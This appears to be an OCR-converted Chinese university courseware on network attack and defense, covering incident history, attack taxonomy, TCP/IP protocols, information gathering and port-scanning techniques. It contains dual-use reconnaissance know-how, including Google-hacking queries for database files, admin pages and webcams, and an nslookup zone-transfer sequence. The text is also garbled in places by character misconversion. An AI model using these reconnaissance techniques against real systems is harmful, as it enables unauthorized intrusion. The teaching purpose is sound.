网络攻击与防御260

网络攻击与防御成都信息工程学院信息平安教研室内容简介本课程主要内容：网络平安概述信息收集网络扫描基于系统的攻击与防御〔windows系统〕脚本攻击与防御恶意代码攻击与防御本课要求上课20学时上机12学时考试模式：闭卷成绩构成：卷面成绩*70%+平时成绩*30%平时成绩构成：上课30%+上机70%第一章网络平安概述成都信息工程学院信息平安教研室1.1、严峻的信息平安问题2000年2月6日前后，美国YAHOO等8家大型网站接连遭受黑客的攻击，直接经济损失约为12亿美元〔网上拍卖“电子港湾〞网站、亚马逊网站、AOL〕此次平安事故具有以下的特点：攻击直接针对商业应用攻击造成的损失巨大信息网络平安关系到全社会2021年中国信息平安热点1.中国超过美国成为全球第一大拥有互联网用户数的国家

截至2021年6月，中国网民数量到达2.53亿，成为世界上网民最多的国家。同时，443端口的流量端口排名从2007年的第4位上升到第2位，这说明已经有大量网站部署了SSL证书来确保网上机密信息安2.电信运营商开始重视用户机密信息平安

中国电信、中国移动等局部省级分公司已经开始在网上营业厅及其他系统部署SSL证书来确保用户机密信息的平安，这说明中国的电信运营商开始从各个方面与国际大运营商看齐，为广阔电信用户提供更加平安可靠的信息效劳。3.金融危机席卷全球信息平安更具投资价值

全球金融风暴已经从金融行业向其他行业蔓延，裁员企业面临由离职人员带来的商业机密外泄问题，加强对商业机密的保护，降低业务运营本钱，相关平安效劳商呈现巨大商机。企业选购信息平安产品(包括SSL证书)将更加理性化，更加注重性能价格比，而并非一味追求品牌。

4.2021年“放心平安用网银〞联合宣传年主题：共筑网上银行绿色通道

4月2日国内18家银行携手，启动“2021放心平安用网银联合宣传年〞活动，共筑网上银行绿色通道，着力为用户打造一个更平安的使用网上银行的环境。本次活动推出的网银绿色通道，由三大核心体系构成：EV证书，网银病毒专杀工具和反欺诈联动机制，分别从反钓鱼网站，反病毒木马盗窃，打击网银犯罪三个层次为网银使用提供全方位保护5.奥运信息平安有保障

奥运会比赛的顺利进行与信息平安系统的大力保障息息相关，北京2021年奥运会的圆满成功说明了针对包括效劳器、网络交换机、路由器、应用软件系统等17,000多个系统的信息平安有保障。

6.2021首届Symbian智能峰会在北京召开

此次Symbian顶峰论坛是由Symbian中国公司首次发起于2021年6月5日在北京召开，智能产业链中各个环节的合作伙伴共同参与了此次盛会。在本次峰会展示了Symbian公司十年开展成就与品牌殊荣，并以“明日的科技，今日的〞为主题，围绕智能相关技术话题展开深入讨论与交流，其中“智能平台平安和代码平安〞最广泛关注。7.地震、雪灾捐款网站被假冒或被“挂马〞

广阔网民对四川地震灾区和南方雪灾开始了规模空前的捐助活动，小额网上捐款得到了普遍欢送。但由于捐款网站没有部署SSL证书而极易被不法分子假冒。相比之下，美国中选总统奥巴马的网上募捐网站就部署了SSL证书，这样既保证了捐款人的网上机密信息平安，也保证了募捐网站不会被假冒。8.2021中国计算机网络平安应急年会暨中国互联网协会网络平安工作年会在深圳召开

2021年4月7日-9日，由国家计算机网络应急技术处理协调中心联合中国互联网协会网络与信息平安工作委员会主办的“2021中国计算机网络平安应急年会暨中国互联网协会网络平安工作年会〞在深圳胜利召开。工业和信息化部奚国华副部长到会祝贺并作题为“加强网络平安、助力北京奥运〞的主旨报告。本次年会共设有“电子政务平安〞、“电子商务和金融平安〞、“ISP&ICP平安〞、“网络平安信息技术〞四个分论坛，与会领导、专家、学者围绕电子政务和电子商务平安、根底信息网络平安保障、培育健康有序的网络平安文化、网络平安应急的国际合作、重点城市的网络平安事件应急处置、平安漏洞的现状与开展趋势等诸多话题进行了广泛而深入的交流与探讨。9.公安部开展2021年度信息网络平安状况调查

公安部公共信息网络平安监察局于4月26日至5月26日组织开展2021年度全国信息网络平安状况和计算机病毒疫情调查活动。调查显示，我国信息网络平安事件发生比例继前3年连续增长后，今年略有下降，信息网络平安事件发生比例为62.7%，同比下降了3％；计算机病毒感染率为85.5％，同比减少了6％，说明我国互联网平安状况有所好转。但屡次发生网络平安事件的比例为50％，屡次感染病毒的比例为66.8％，说明我国互联网用户的网络平安意识仍比较薄弱,对发生网络平安事件未给予足够重视。10.构建可信网络，“中国反钓鱼网站联盟〞成立

2021年7月18日，由国内银行证券机构、电子商务网站、域名注册管理机构、域名注册效劳机构、专家学者组成的“中国反钓鱼网站联盟〞在京正式宣布成立。联盟已初步建立快速解决机制，借助停止钓鱼网站CN域名解析等手段，及时终止其危害，构建可信网络。1.2、急需解决的假设干平安问题信息平安与高技术犯罪1999年，上海XX证券部电脑主机被入侵2000年2月14日，中国选择网〔上海〕受到黑客攻击，造成客户端机器崩溃，并采用类似攻击YAHOO的手法，通过攻击效劳器端口，造成内存耗尽和效劳器崩溃我国约有64%的公司信息系统受到攻击，其中金融业占总数的57%不受欢送的垃圾邮件的现象愈演愈烈1999年4月26日，CIH病毒“世纪风暴〞媒体内容的平安性凯文米特尼克凯文•米特尼克是美国20世纪最著名的黑客之一，他是“社会工程学〞的创始人1979年他和他的伙伴侵入了北美空防指挥部1983年的电影?战争游戏?演绎了同样的故事，在片中，以凯文为原型的少年黑客几乎引发了第三次世界大战莫里斯蠕虫〔MorrisWorm〕时间1988年肇事者-RobertT.Morris,美国康奈尔大学学生，其父是美国国家平安局平安专家机理-利用sendmail,finger等效劳的漏洞，消耗CPU资源，拒绝效劳影响-Internet上大约6000台计算机感染，占当时Internet联网主机总数的10%，造成9600万美元的损失CERT/CC的诞生-DARPA成立CERT〔ComputerEmergencyResponseTeam〕，以应付类似“蠕虫〔MorrisWorm〕〞事件94年末，俄罗斯黑客弗拉基米尔·利文与其伙伴从圣彼得堡的一家小软件公司的联网计算机上，向美国CITYBANK银行发动了一连串攻击，通过电子转帐方式，从CITYBANK银行在纽约的计算机主机里窃取1100万美元96年8月17日，美国司法部的网络效劳器遭到黑客入侵，并将“美国司法部〞的主页改为“美国不公正部〞，将司法部部长的照片换成了阿道夫·希特勒，将司法部徽章换成了纳粹党徽，并加上一幅色情女郎的图片作为所谓司法部部长的助手。此外还留下了很多攻击美国司法政策的文字96年9月18日，黑客光临美国中央情报局的网络效劳器，将其主页由“中央情报局〞改为“中央愚蠢局〞96年12月29日，黑客侵入美国空军的全球网网址并将其主页肆意改动，其中有关空军介绍、新闻发布等内容被替换成一段简短的黄色录象，且声称美国政府所说的一切都是谎话。迫使美国国防部一度关闭了其他80多个军方网址98年2月25日，美国国防部四个海军系统和七个空军系统的电脑网页遭侵入98年5月底，印度原子研究中心的主页()遭侵入98年8月31日，澳大利亚主要政党和政府官员的网站遭黑客袭击，网址被篡改98年9月13日，纽约时报站点〔〕遭黑客袭击2000年2月，著名的Yahoo、eBay等高利润站点遭到持续两天的拒绝效劳攻击，商业损失巨大2002年3月底，美国华盛顿著名艺术家GloriaGeary在eBay拍卖网站的帐户，被黑客利用来拍卖IntelPentium芯片2002年6月，日本2002年世界杯组委会的官方网站由于黑客成功侵入并在该网站上发布侮辱性内容而被迫关闭中美五一黑客大战2001年5月1日是国际劳动节，5月4日是中国的青年节，而5月7日那么是中国在南斯拉夫的大使馆被炸两周年的纪念日。中国黑客在这几个重大的纪念日期间对美国网站发起了大规模的攻击美国局部被黑网站美国加利福尼亚能源部日美社会文化交流会白宫历史协会UPI新闻效劳网华盛顿海军通信站国内网站遭攻击的分布红色代码2001年7月19日，全球的入侵检测系统(IDS)几乎同时报告遭到不名蠕虫攻击在红色代码首次爆发的短短9小时内，以迅雷不及掩耳之势迅速感染了250,000台效劳器最初发现的红色代码蠕虫只是篡改英文站点主页，显示“Welcometo://!HackedbyChinese!〞随后的红色代码蠕虫便如同洪水般在互联网上泛滥，发动拒绝效劳(DoS)攻击以及格式化目标系统硬盘，并会在每月20日～28日对白宫的WWW站点的IP地址发动DoS攻击，使白宫的WWW站点不得不全部更改自己的IP地址。“红色代码〞的蔓延速度尼姆达〔Nimda〕尼姆达是在9·11恐怖袭击整整一个星期后出现的，当时传言是中国为了试探美国对网络恐怖袭击的快速反响能力而散布了尼姆达病毒尼姆达是在早上9:08发现的，明显比红色代码更快、更具有摧毁功能，半小时之内就传遍了整个世界。随后在全球各地侵袭了830万部电脑，总共造成将近10亿美元的经济损失传播方式包括：电子邮件、网络临近共享文件、IE浏览器的内嵌MIME类型自动执行漏洞、IIS效劳器文件目录遍历漏洞、CodeRedII和Sadmind/IIS蠕虫留下的后门等SQLSlammer蠕虫Slammer的传播数度比“红色代码〞快两个数量级在头一分钟之内，感染主机数量每8.5秒增长一倍；3分钟后该病毒的传播速度到达峰值〔每秒钟进行5500万次扫描〕；接下来，其传播速度由于自身挤占了绝大局部网络带宽而开始下降；10分钟后，易受攻击的主机根本上已经被感染殆尽30分钟后在全球的感染面积2003年8月11日首先被发现，然后迅速扩散，这时候距离被利用漏洞的发布日期还不到1个月该蠕虫病毒针对的系统类型范围相当广泛〔包括WindowsNT/2000/XP〕截至8月24日，国内被感染主机的数目为25~100万台全球直接经济损失几十亿美金RPCDCOM蠕虫1.3网络平安概念网络平安的意义 所谓“网络平安〞，是指网络系统的硬件、软件及其系统中的数据受到保护，不因偶然的或者恶意的原因而遭到破坏、更改、泄露，系统可以连续可靠正常地运行，网络效劳不被中断。2网络攻击与防御根底2.1远程攻击根底A．攻击的位置〔1〕远程攻击〔2〕本地攻击〔3〕伪远程攻击B.攻击的深度表层攻击读访问非根式的写与执行访问根式的写和执行访问

简单拒绝效劳；本地用户获得非授权读权限；本地用户获得非授权写权限；远程用户获得非授权帐号信息；远程用户获得特权文件的读权限；远程用户获得特权文件的写权限；远程用户拥有了系统管理员权限。C.攻击的层次之间的关系D.攻击分类在最高层次，攻击被分为两类：主动攻击：包含攻击者访问他所需要信息的成心行为。主动攻击包括拒绝效劳攻击、信息篡改、资源使用、欺骗等攻击方法。

被动攻击：主要是收集信息而不是进行访问，数据的合法用户对这种活动一点也不会觉察到。被动攻击包括嗅探、信息收集等攻击方法。图1、攻击分类就目前常见的攻击，大致可以分为几大类〔参见图1〕：窃听：指攻击者通过非法手段对系统活动的监视从而获得一些平安关键信息。目前属于窃听技术的常用攻击方法有：键击记录：是植入操作系统内核的隐蔽软件，通常实现为一个键盘设备驱动程序，能够把每次键击都记录下来，存放到攻击者指定的隐藏的本地文件中。如PCAgent等。网络监听：是攻击者一旦在目标网络上获得一个立足点之后刺探网络情报的最有效方法，通过设置网卡的混杂模式获得网络上所有的数据包，并从中抽取平安关键信息，如明文方式传输的口令。如Win32平台下的sniffer等免费工具，Unix平台下的libpcap网络监听工具库。非法访问数据：是攻击者或内部人员违反平安策略对其访问权限之外的数据进行非法访问。获取密码文件：攻击者进行口令破解获取特权用户或其他用户口令的必要前提。欺骗：指攻击者通过冒充正常用户以获取对攻击目标访问权或获取关键信息的攻击方法，属于此类攻击的方法有：获取口令：通过缺省口令、口令猜测和口令破解三种途径。针对一些弱口令进行猜测。也可以使用专门的口令猜测工具进行口令破解，如遍历字典或高频密码列表从而找到正确的口令。如Win32平台的LOphtcrack等。恶意代码：包括特洛伊木马应用程序、邮件病毒、网页病毒等，通常冒充成有用的软件工具、重要的信息等，诱导用户下载运行或利用邮件客户端和浏览器的自动运行机制，在启动后悄悄安装恶意程序，通常为攻击者给出能够完全控制该主机的远程连接。网络欺骗：攻击者通过向攻击目标发送冒充其信任主机的网络数据包，到达获取访问权或执行命令的攻击方法。具体的有IP欺骗、会话劫持、ARP重定向和RIP路由欺骗等。拒绝效劳：指终端或者完全拒绝对合法用户、网络、系统和其他资源的效劳的攻击方法，其意图就是彻底破坏，这也是比较容易实现的攻击方法。特别是分布式拒绝效劳攻击对目前的互联网构成了严重的威胁，造成的经济损失也极为庞大。拒绝效劳攻击的类型按其攻击形式分为：导致异常型：利用软硬件实现上的编程缺陷，导致其出现异常，从而使其拒绝效劳。如PingofDeath攻击等。资源耗尽型：通过大量消耗资源使得攻击目标由于资源耗尽不能提供正常的效劳。视资源类型的不同可分为带宽耗尽和系统资源耗尽两类。带宽耗尽攻击的本质是攻击者通过放大等技巧消耗掉目标网络的所有带宽，如Smurf攻击等。系统资源耗尽型攻击指对系统内存、CPU或程序中的其他资源进行消耗，使其无法满足正常提供效劳的需求。如SynFlood攻击等。欺骗型：ARP拒绝效劳攻击数据驱动攻击：通过向某个程序发送数据，以产生非预期结果的攻击，通常为攻击者给出访问目标系统的权限，大致可分为：缓冲区溢出：通过往程序的缓冲区写入超出其边界的内容，造成缓冲区的溢出，使得程序转而执行其他攻击者指定的代码，通常是为攻击者翻开远程连接的ShellCode，以到达攻击目标。如Windows平台下的Code-Red、Blaster、Sasser等都是通过缓冲区溢出攻击获得系统管理员权限后进行传播。格式化字符串攻击：主要是利用由于格式化函数的微妙程序设计错误造成的平安漏洞，通过传递精心编制的含有格式化指令的文本字符串，以使目标程序执行任意命令。输入验证攻击：针对程序未能对输入进行有效的验证的平安漏洞，使得攻击者能够让程序执行指令的命令。最著名的是1996年的PHF攻击。同步漏洞攻击：利用程序在处理同步操作时的缺陷，如竞争状态、信号处理等问题，以获得更高权限的访问。信任漏洞攻击：利用程序滥设的信任关系获取访问权的一种方法，如Win32平台下互为映象的本地和域Administrator凭证、LSA密码等。2.2远程攻击的动机分析和一般流程

A.黑客为什么要攻击？想要在别人面前炫耀自己的技术，如进入别人的电脑去修改一个文件或目录名。恶作剧、练功，这是许多人或学生入侵或破坏的最主要原因，除了有练功的效果外还有些许网络探险的感觉。窃取数据，可能是偷取硬盘中的文件或各种上网密码，然后从事各种商业应用。想复仇的事后报复者，如对老板或公司制度不满，事先把报复程序或病毒程序写入所编程序，并规定在将来某时，或某条件下激活发作，摧毁原公司网络系统。抗议或宣示，如2001年5月1日中美黑客大战，中美两国的黑客相互攻击对方网站，双方均有数以千计的网站遭到攻击，轻者被篡改主页面，严重的那么整个系统遭受消灭性打击。B.黑客攻击流程攻击的一般过程预攻击内容：获得域名及IP分布获得拓扑及OS等获得端口和服务获得应用系统情况跟踪新漏洞发布目的：收集信息，进行进一步攻击决策攻击内容：获得远程权限进入远程系统提升本地权限进一步扩展权限进行实质性操作目的：进行攻击，获得系统的一定权限后攻击内容：植入后门木马删除日志修补明显的漏洞进一步渗透扩展目的：消除痕迹，长期维持一定的权限2.3网络防御意义

进攻和防御是对立统一的矛盾体必须树立“积极防御〞的网络战指导思想，因为在网络战中“进攻未必就是最好的防御〞。“网络防御作战〞的成熟研究，是网络战尽早到达“攻防平衡〞的前提和根底。2.4网络防御构架

网络防护被动防护：包括路由器过滤、防火墙等主动防护：在充分利用被动防护技术的根底上，还包括攻击预警、入侵检测、网络攻击诱骗和反向攻击等网络主动防御技术 在增强和保证被网络平安性的同时，及时发现正在遭受的攻击并及时采取各种措施使攻击者不能到达其目的，使自己的损失降到最低的各种方法和技术。网络主动防御平安模型管理——对技术的管理、对人的管理、对政策的管理对技术的管理——通过策略进行，以使各种平安技术能成为一个有机的整体，从而提高系统的整体防护能力。对人的管理——通过各种政策和平安制度对参与信息系统的人员进行平安制度强制的执行、平安意识和平安技术的培训等，增强参与信息系统的人员的平安意识和遵纪守法意识，提高平安警觉性，从而加强系统的整体平安性。对政策的管理——包括政策的制定、执行和改进等。策略——将各种平安技术有机结合起来的关键。纵深防御策略纵深防御策略描述如下：网络平安首先是网络管理的平安，这包括对技术管理的平安、对人员管理的平安和对政策管理的平安。这是一个层次性的循环防御策略，该层次性的结构可以根据网络攻击的深入提供不同层次的防护。层与层之间必须进行信息交互，也可跨层进行信息交互，信息的交互需要利用平安的网络通信协议进行。各层子系统进行信息交互的目的就是使各层间相互配合来保证一层被攻破，会有下一层的防护阻止网络攻击的继续进行。网络内部的攻击比外部攻击要容易，其危害更大。所以网络监控系统要实时监控内部网络的各个主机行为，并根据相应的策略限制网络内部的可能的异常行为。技术操作人纵深防御策略的防护流程Step1：根据对已经发生的网络攻击或正在发生的网络攻击及其趋势的分析，以及对本地网络的平安性分析，预警对可能发生的网络攻击提出警告。Step2：网络系统的各种保护手段〔如防火墙〕除了在平时根据其各自的平安策略正常运行外，还要对预警发出的警告做出及时的反响，从而能够在本防护阶段最大限度的阻止网络攻击行为。Step3：检测手段包括入侵检测、网络监控和网络系统信息和漏洞信息检测等。其中的漏洞信息检测在纵深防御的假设干阶段都要用到，比方预警、检测和还击等。入侵检测检测到网络入侵行为后要及时通知其他的防护手段，比方防火墙、网络监控、网络攻击响应等。网络监控系统不仅可以实时监控本地网络的行为从而阻止来自内部网络的攻击，同时也可作为入侵检测系统的有益补充。Step4:只有及时的响应才能使网络攻击造成的损失降到最低。响应除了根据检测的入侵行为及时地调整相关手段〔如防火墙、网络监控〕来阻止进一步的网络攻击，还包括其他的主动积极的技术：网络僚机、网络攻击诱骗、网络攻击源精确定位和电子取证等。 网路僚机：如蜜罐系统。一方面可以牺牲自己来保护网络，另一方面可以收集网络攻击者信息，为攻击源定位和电子取证提供信息。 网络攻击诱骗：显著提高网络攻击的代价，并可以将网络攻击流量引导到其他主机上。 网络攻击源定位：除了可以利用网络僚机和网络攻击诱骗的信息外，还可以利用其他技术〔如移动Agent、只能分布式Agent、流量分析〕来定位攻击源。 电子取证：综合利用以上信息，根据获得的网络攻击者的详细信息进行电子取证，为法律起诉和网络反向攻击提供法律凭证。Step5：遭受到网络攻击后，除了及时的阻止网络攻击外，还要及时地恢复遭到破坏的本地系统，并及时地对外提供正常的效劳。Step6：网络还击是防护流程的最后一步，也是重要的一步。根据获得的网络攻击者的详细信息，网络还击综合运用探测类、阻塞类、漏洞类、控制类、欺骗类和病毒类攻击手段进行还击。网络主动防御系统体系结构网络主动防御平安模型＋纵深防御策略技术层面预警 预警是对可能发生的网络攻击给出预先的警告。包括几方面：漏洞预警：根据的系统漏洞或研究发现的系统漏洞来对可能发生的网络攻击提出预警。行为预警：分析网络黑客的各种行为来发现其可能要进行的网络攻击。攻击趋势预警：分析已发生或正在发生的网络攻击来判断可能的网络攻击。情报收集分析预警：综合分析通过各种途径收集来的情报判断是否有发生网络攻击的可能性。保护 保护就是采用一切的手段保护我们信息系统的可用性、完整性、机密性、可用性、可控性和不可否认性。这里的手段一般指静态的防护手段，包括：防火墙、防病毒、虚拟专用网、操作系统平安增强等。检测 检测是非常重要的一个环节，检测的目的是发现网络攻击，检测本地网络存在的非法信息流，以及检测本地网络存在的平安漏洞，从而有效地组织网络攻击。主要用到的技术有入侵检测技术、网络实时监控技术和网络平安扫描技术等。响应 响应就是对危及网络平安的时间和行为做出反响，阻止对信息系统的进一步破坏并使损失降到最低。要求在检测到网络攻击后及时地阻断网络攻击，或者将网络攻击引诱到其它的主机上，使网络攻击不能对信息系统造成进一步的破坏。另外还要定位网络攻击源，并进行网络攻击取证，为诉诸法律和网络还击做准备。恢复 及时地恢复系统，使系统能尽快正常地对外提供效劳，是降低网络攻击造成损失的有效途径。为了能保证收到攻击后能及时成功地恢复系统，必须在平时做好备份工作。主要包括对数据的备份，以及对系统的备份。备份技术分为三种：现场内备份、现场外备份和冷热备份。还击 还击是对网络攻击者进行反向的攻击。也就是运用各种网络攻击手段对网络攻击者进行攻击，迫使其停止攻击。网络平安通信协议 要构建一个纵深的网络防御体系，各种技术所构成的子系统建的信息交互是不可防止的。网络通信协议是保证各个子系统通信平安的基石。3.网络协议

3.1TCP/IP体系结构

3.2IP协议3.3TCP协议

3.4UDP协议

3.5ARP协议和RARP协议

IPMACMACIP3.6ICMP协议

Internet控制报文协议〔ICMP〕允许主机或路由器报告过失情况和提供有关异常情况的报告。

消息类型描述目标不可达（Destinationunreachable）分组不能传送到目的端超时（Timeexceeded）分组中Time_to_live字段已经为0参数有问题（Parameterproblem）分组中头部包含无效的字段源端发送速度降低（Sourcequench）命令源端降低发送分组的速度重新定向（Redirect）路由器告诉源主机其分组的路由有误问讯请求（Echorequest）询问目的主机是否是活性或可达的问讯回答（Echoreply）被询问的主机是否活动或可达的时间戳请求（Timestamprequest）与问讯请求一样，只是附带上时间戳时间戳回答（Timestampreply）与问讯回答一样，只是附带上时间戳3.7DNS协议

DNS通过一个名为“解析〞的过程将域名转换为IP地址，或将IP地址转换为域名。DNS使用查找表格来将二者的值关联起来。3.8SMTP协议和POP3协议

SMTP协议简单邮件传输协议(SimpleMailTransferProtocol，SMTP)是为网络系统间的电子邮件交换而设计的。UNIX、MVS、VMS、基于Windows的操作系统以及基于NovellNetWare的操作系统都可以通过SMTP来在TCP/IP上交换电子邮件。通过SMTP发送的消息由两局部组成：地址头和消息文本。POP3协议POP协议允许工作站动态访问邮件效劳器上的邮件，目前已开展到第三版，称为POP3。POP3允许工作站检索邮件效劳器上的邮件。POP3传输过程发生在站与站之间，其中传输的消息可以是指令，也可以是应答。POP协议支持“离线〞邮件处理。其具体过程是：邮件发送到效劳器上，电子邮件客户端调用邮件客户机程序以连接效劳器，并下载电子邮件的电子协议。这种离线访问模式基于存储并转发效劳，将邮件从邮件效劳器端送到个人终端机器上，一般是PC机或Mac。一旦邮件发送到PC机或Mac上，邮件效劳器上的邮件将会被删除。POP3并不支持效劳器邮件的扩展操作，此过程由更高级综合的IMAP4〔因特网消息访问协议〕完成。作为传输协议的POP3使用TCP的110端口。POP3是发送在客户机和效劳器间的ASCII信息。POP3命令摘要如表所示。命令描述USER用户名PASS用户密码STAT服务器信息RETR获取的信息序号DELE删除的信息序号LISTTOP<messageID><nombredelignes>从头开始（包含协议头）打印X行信息QUIT退出POP3服务器POP3命令摘要第二章信息收集1概述

概念 信息收集是指通过各种方式获取所需要的信息。信息收集是信息得以利用的第一步，也是关键的一步。信息收集工作的好坏，直接关系到入侵与防御的成功与否。为了保证信息收集的质量，应坚持以下原那么： 〔1〕准确性原那么 该原那么要求所收集到的信息要真实，可靠。这是最根本的要求。 〔2〕全面性原那么 该原那么要求所搜集到的信息要广泛，全面完整。 〔3〕时效性原那么 信息的利用价值取决于该信息是否能及时地提供，即它的时效性。信息只有及时、迅速地提供给它的使用者才能有效地发挥作用。2.信息收集技术信息收集—非技术手段合法途径从目标机构的网站获取新闻报道，出版物新闻组或论坛社会工程手段假冒他人，获取第三方的信任搜索引擎2.1搜索引擎

搜索引擎是自动从因特网收集信息，经过一定整理以后，提供给用户进行查询的系统。它包括信息搜集、信息整理和用户查询三局部。GoogleHackingintext: 将网页中正文中的字符作为搜索条件，例如：输入“intext:平安〞，将搜索出正文里包含“平安〞关键字的网页。allintext: 与intext类似。intitle: 在网页标题中搜索包含关键字的网页，例如：输入“intitle:管理〞，即可找出网页标题中包含“管理〞的网页。allintitle: 与intitle类似。cache: 在google的缓存里搜索，这里可能会找到很多很有用的东西哦，虽然此刻网页已经删除，但google效劳器里还保存有。define: 查找词语的定义，例如：输入“definehacker〞，即可找到“hacker〞的相关定义。filetype: 查找指定类型的网页，这个关键字非常有用，例如：输入“filetype:bak〞即可找出文件类型为bak的文件〔该文件很可能由各种编辑器自动备份产生，有可能找到网站的源码〕；又如，通常黑客会尝试下载网站的数据库文件〔*.mdb〕，即可用“filetype:mdb〞来搜索，找到数据库文件后直接下载，或许就能得到网站的权限。info: 查找指定站点的根本信息。inurl: 查找在url中包含搜索词的网页，例如：黑客惯用的“inurl:admin〞偶尔就能搜索出网站的登录页面，从而进行下一步的攻击。link: 搜索与某网站做了链接的网页，例如：输入“〞即可搜索出包含有链接到“〞的网页〔这个可以用来找出有多少网页在链接你的网站哦〕。site: 用于搜索某一域内的网页，例如：输入“site:sohu〞，即可实现在“sohu〞域内搜索的目的。还有一些符号在搜索中也是很有用的：+必须包含有的搜索词；-不能包含的搜索词；~搜索同意词；.单一通配符；*通配符，可匹配多个字符；“〞精确的查询。2.2域搜索

概念：域搜索是在指定的一个网域内进行信息搜索。举例1： 首先翻开，然后输入“allinurl:login〞； 我们选中其中的一个“://〞翻开； 搜索此站“site:XXX〞的二级域名网站； 看一下有没有pdf电子文档，“site:XXXfiletype:pdf〞； 输入“info:XXX〞，查到该网站的根本信息。举例2：在Google的搜索关键字“intitle:〞WJ-NT104MainPage〞，即可找到很多网络摄像头。 如：2.3域名解析域名：为了方便记忆而专门建立的一套地址转换系统。一个域名对应一个IP地址，而多个域名可以同时被解析到一个IP地址。域名解析：域名到IP地址的转换过程。域名解析效劳器：DNS—DomainNameSystem。2.3.1动态域名解析代表商业性公司Yahoo代表公司名字www代表yahoo公司的一台效劳器2.4路由跟踪

概念 路由跟踪就是从本地开始到达某一目标地址所经过的路由设备，并显示出这些路由设备的IP、连接时间等信息。作用：如果某段网络不通或网速很慢，可以利用路由跟踪找出某故障地点，方便维护人员的维护工作。对于“黑客〞来说，这是个很有用的功能，他可以大概分析出你所在网络的状况。这对于第一步的周边网络环境信息收集很有用。tracert：用IP生存时间TTL字段和ICMP错误消息来确定从一个主机到网络上其他主机的路由。Ping、fping、pingsweepARP探测FingerWhoisDNS/nslookup搜索引擎〔google、百度〕telnet3.信息收集的工具软件(技术手段)ping作用和特点用来判断目标是否活动；最常用；最简单的探测手段；Ping程序一般是直接实现在系统内核中的，而不是一个用户进程。原理Type=8Type=0ping类型为8，表示“回响请求〞类型为0，表示“回响应答〞主机在线情况主机不应答情况1〕主机不在线2〕防火墙阻断ICMP探测ping表示机器不在线；或者防火墙阻断。举例1：Replyfrom0:bytes=32time<1msTTL=32Replyfrom0表示回应ping的ip地址是。bytes=32表示回应报文的大小，这里是32字节。time<1ms表示回应所花费的时间，小于1毫秒。TTL=32，TTL是生存时间，报文经过一个路由器就减1，如果减到0就会被抛弃。这里是32。举例2：Pingwar2.0——群ping.ARP探测

能探测同一局域网内的主机，因为防火墙不能阻断ARP请求。finger作用和特点UNIX系统中用于查询用户情况的程序网络效劳效劳端口：tcp79效劳端程序fingerd,客户端程序finger不需要认证就提供用户信息命令格式：finger[选项][使用者][用户@主机]姓名

最后登录时间fingerwhois作用和特点网络效劳效劳端口：tcp43效劳端程序whoisd,客户端程序finger提供目标系统的地址信息参考网站1参考网站2:///常规信息收集网络域名网络Ip地址分配使用单位地址DNS作用和特点网络效劳效劳端口：udp53效劳端程序bind,客户端程序nslookup提供目标系统域名与地址的转换Nslookup两种模式：交互式和非交互式。非交互式模式：Nslookup–DNS效劳器或IP地址Nslookup>?//查看helpNslookup通过nslookup获得子域名setquerytype=anyxxx.xxx

#输入域名后根据输出内容找到dns效劳器serverns1.xxx.xxx.xxx#连接DNS效劳器ls-dxxx.xxx第三章网络扫描主机发现技术

主机发现技术主要分三种：ping扫描ARP扫描端口扫描1.Ping扫描确定哪些机器是up的2种方式ICMP类似于ping，发送icmp消息给目标，看是否有返回TCPping给目标特定的tcp端口(如常用的80)发送ack消息，如果返回rst，说明机器up。常用的tracetcp。2.ARP扫描

ARP〔AddressResolutionProtocol〕即地址解析协议，它是用于局域网内的物理地址。ARP扫描是指通过向目标主机发送ARP请求〔查询目标主机的物理地址〕，如果目标主机回应一个ARP响应报文，那么说明它是存活的。下面是ARP扫描的示意图：3.端口扫描3.1目的判断目标主机开启了哪些端口及其对应的效劳确定目标系统正在运行的TCP/UDP效劳在扫描时希望隐藏自己3.2扫描根底TCP数据报首部标志域TCP连接的建立过程TCP连接的释放过程TCP/IP实现遵循的原那么TCP数据报首部标志域(1)6个比特标志位SYN用来建立连接，同步双方的序列号。SYN=1&ACK=0,连接请求包SYN=1&ACK=1,接受请求FIN释放连接包RST复位一个连接如果收到一个分段不属于该主机的任何一个连接，发送RST包TCP数据报首部标志域〔2〕URG紧急数据。表示数据包中包含紧急数据。ACK确认标志位。表示数据包中确实认号有效。PSHPUSH，如果为1，接受端应尽快把数据传送给应用层。TCP可靠性通过校验和、定时器、数据序号、应答号来实现数据的可靠传输TCP中的序列号为每个发送的字节分配一个序号，用来保证数据的顺序，剔除重复的数据一个TCP连接包含两个流〔分别代表每个方向的数据〕建立连接时流的发送方选择一个初始序号ISN(initialsequencenumber)ISN必须随机选取才平安TCP连接的建立过程TCP连接的释放过程1CSSYNSEQ=104ACK=02SCSYNACKSEQ=319ACK=1053CSACKSEQ=105ACK=3204SCPSHACKSEQ=320ACK=105Data15bytes5CSPSHACKSEQ=105ACK=335Data15bytes6SCACKSEQ=335ACK=120Data15bytesTCP/IP实现遵循的原那么原那么1：当一个SYN或者FIN数据包到达一个关闭了的端口，效劳器丢弃该数据包，并返回一个RST数据包；TCP/IP实现遵循的原那么原那么2：当一个RST数据包到达一个监听端口或者关闭的端口，RST数据包都会被效劳器丢弃。TCP/IP实现遵循的原那么原那么3：当一个ACK数据包到达一个监听的端口，效劳器会丢弃这个数据包，并回应一个RST数据包。TCP/IP实现遵循的原那么原那么4：当一个FIN数据包到达一个监听端口时，数据包将会被丢弃。3.3端口扫描分类技术

端口扫描分类扫描技术分析扫描分类TCP全连接开放扫描半开放扫描TCP反向ident扫描IP头信息dumb扫描SYN扫描FIN扫描隐蔽扫描TCP分段ACK扫描XMAS扫描空扫描扫射扫描SYN/ACK扫描ping扫射其它扫描UDP/ICMP不可达FTP弹跳UDP扫射UDPrecvfrom/write扫描ACK扫射SYN扫射ICMP扫射扫描技术分析常规扫描技术调用connect函数直接连接被扫描端口无须任何特殊权限速度较慢，易被记录高级扫描技术利用探测数据包的返回信息〔例如RST〕来进行间接扫描较为隐蔽，不易被日志记录或防火墙发现完全连接扫描(TCPconnect扫描)ClientSYNServerSYN/ACKClientACKClientSYNServerRST/ACKClientRST端口开放端口关闭TCPconnect扫描直接用connect连接对方的端口连接成功，说明对方端口是开放的优点简单，不需要特权用户缺点容易被觉察在应用日志中会有记录下来一些没有任何动作的连接被扫描主机开放的端口不提供效劳的端口防火墙过滤的端口

